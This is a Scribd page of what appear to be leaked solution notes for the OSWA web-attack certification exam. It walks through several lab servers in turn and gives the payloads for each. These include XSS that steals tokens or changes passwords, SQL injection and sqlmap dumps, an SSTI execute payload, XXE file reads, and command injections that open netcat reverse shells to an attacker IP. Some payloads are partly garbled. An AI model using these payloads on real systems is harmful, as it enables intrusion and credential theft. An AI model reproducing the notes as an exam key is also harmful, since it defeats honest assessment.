Scribd
Upload
294 views5 pages

OSWA Exam

The document outlines various security vulnerabilities and exploitation techniques for different local servers, including XSS, CSRF, SQL injection, and command injection. It provides step-by-step instructions on how to exploit these vulnerabilities to gain unauthorized access and retrieve local flags. Each section details the specific server IP, the type of vulnerability, and the proof of concept for successful exploitation.

Uploaded by

roylewandoski3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
294 views5 pages

OSWA Exam

The document outlines various security vulnerabilities and exploitation techniques for different local servers, including XSS, CSRF, SQL injection, and command injection. It provides step-by-step instructions on how to exploit these vulnerabilities to gain unauthorized access and retrieve local flags. Each section details the specific server IP, the type of vulnerability, and the proof of concept for successful exploitation.

Uploaded by

roylewandoski3
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

OSWA Exam

192.168.X.62 Share Notez


local (XSS/CSRF)
Create user account
Login into your newly created account
The password change feature is flawed, it doesn't check old password, there is no
CSRF protection, and also no CORS:

function changePassword() {
var password = $('#newPassword').val();

var postBody = "password="+password;


fetch('[Link] {
method:'POST',
mode:'cors',
credentials:'include',
headers:{
'Content-Type':'application/x-www-form-
urlencoded;charset=UTF-8'
},
body:postBody
}

In the "Report", post the XSS payload (you can probably do a CSRF directly, but that is
easier with Burp Pro) in <script src=[Link]

fetch('[Link]
{
method: 'POST',
credentials: 'include',
headers: {
'Content-Type':'application/x-www-form-urlencoded'
},
body:'password=password',
mode: 'no-cors'
})

or steal the localStorage, on Kali : python3 -m [Link] 9090


fetch('[Link]

Wait 5 minutes, the admin will review it


Login to Administrator with new password (or localStorage token), you will get the local
flag

proof (needs completion)


The delete function is PostGreSQL injectable with UUID prefix, but may not be possible
to read file ?!
POST /api/admin/note/delete?noteId=AAAAA-BBBB-UUUID-HERE-
FILTER'%3b(select+1+from+pg_sleep(5))%3b+--+-
POST /api/admin/note/delete?
noteId=XXXXXXXXXXXXX';select+case+when+substring(table_name,1,1)%3d'a'+then
+pg_sleep(5)+else+pg_sleep(0)+end+from+information_schema.tables+limit+1;+--

192.168.X.86 | Star Purpose (by Kaleb)


local
SQLi in the username (put a quote ' and see the DBMS with the error message)
Dump with sqlmap, and catch user and password
sqlmap -u [Link] --forms --batch --dbs

and then replace --dbs with -D starfires --dump

Connect as admin and get the local flag.

proof
1. Create a new post and select the checkbox 'Archive uncompressed'
2. Run a listener on your Kali: nc -lvnp 9090
3. In Burp, perform a command injection in the archive parameter, for example

blogPost=fooBar&archiveCheckbox=XAK2Wzaagh;nc -c bash YOURIP 9090


or
blogPost=fooBar&archiveCheckbox=archive"|nc -nv YOURIP 9090 -e /bin/bash |

Don't forget to encode if needed

Read [Link]

192.168.X.65 Hello MecSecPay


local
Put data in both "Last Name" and "Zipcode" (but not in EasyCode)
Zipcode (or Last name, eventually) is vulnerable to "Microsoft SQL Server/Sybase
stacked queries (comment)"
Save the Burp request, and run SQLMap and dump the credentials:
sqlmap -r [Link] -p zipcode --dbs --batch
sqlmap -r [Link] -p zipcode --batch -D micrathene --tables
sqlmap -r [Link] -p zipcode --batch -D micrathene --dump
Enumerate the app pages with ffuf -u [Link] -w
/usr/share/wordlists/dirb/[Link] and find the page "controlpanel"
Use the crendentials for access to admin account, and access local flag

proof
There is an Server-Side Template Injection (SSTI) in the Receipt menu > template
[Link]

Change the template (you may need to adapt if the framework is different):
{"[Link]"?
′′f reemarker. template. utility. Execute′′?new()(′′id′′)

new()("cat [Link]")}

Go in the Reports (menu on the left) and select from 2021 to today, you'll see multiple
"EasyCode".
Now go back to the main page, enter this EasyCode, simulate a use who would pay their
statement, enter fake card and then once payment is validated, click print receipt to generate
a receipt from template, and it will render the template.

192.168.X.68 Ninox Printwerks


local
1. In [Link] you can see the bio of two users, niomi or noah
2. Create an account ([Link] then log in with.
3. Browse to [Link]
4. Enable interception of requests in Burp (or change the hidden form values)
5. Change the hidden input 'userid' (CSRF or even without current password works)
6. Change the userid to 1 (noah), remove the parameter oldpass
7. Now you can login with username noah and the password you set, he is admin

proof
1. Place a new order in [Link] with normal user, and put the XML
XXE payload in the "Model content"
<?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM
"[Link] ]> <foo>&xxe;</foo>

2. Click on your Order Id, then "Submit for Review", and note the Order Id (it must then
show "Order Status: Under Review")
3. Logout, and relog as admin; In the admin page, click "View orders", select the previous
Order Id, the click "Check Model"; this will not render in the browser, so get the result in
Burp Suite
{"status": "ok", "message": "Model data parsed succesfully", "parsed":
"FLAG_HERE\n"}

OLD local, SSRF not useful anymore


Create user account in [Link]
Login in [Link]
In [Link] select "Get Content from URL" and insert the SSRF
[Link]
You will get the session key in the result
Replace the session key in the Burp Suite/Chrome Dev tools
Access to the admin profile page
Click Admin Panel you get the [Link]

192.168.X.80 Ryan's Retro Review


local
Below the login form, there is a text saying "I will review all login attempts in
loginChecker", this means logins are probably reflected somewhere
Login, with a request for example : username=
<script+src=[Link]
</script>&password=aaa&submit=Log+On
and [Link] being :
[Link]='[Link]
Grab the cookie and login as Administrator
Run a ffuf/dirbuster with [Link] and you'll find the page /_private/ where flag is

proof
Administrator has access to more projects, in [Link]
There is blacklist filter, in the cmd project, for example it is possible to do hostname but
not whoami.
You can bypass the filter by adding bash quotes, for example : ca't' [Link]
192.168.X.70 (old Lamp)
local
In main page, click "Order Custom", then change the "Type of Lamp"
In Burp Suite, replace the lamp type with ./[Link]
The config file contains the root password.
Login with the root password, then you will find the [Link]

proof
In the Lamp Template page, upload a PHP reverse shell code
([Link]
Access it with the URL [Link]

192.168.X.85 (old Kaleb)


local
There is an hidden page [Link]
Run cewl on this page to create a wordlist: cewl [Link]
Login to [Link] with the username "kaleb" and password
"Pulchritudinous"
You will find the local

proof
post a message in admin page, and select "Archive Uncompressed"
In Burp Suite, replace the last parameter "archive" with a command injection (for
example nc -e IP_KALI 8080 )
Inject the NC command with URL encoding and run the reverse shell

You might also like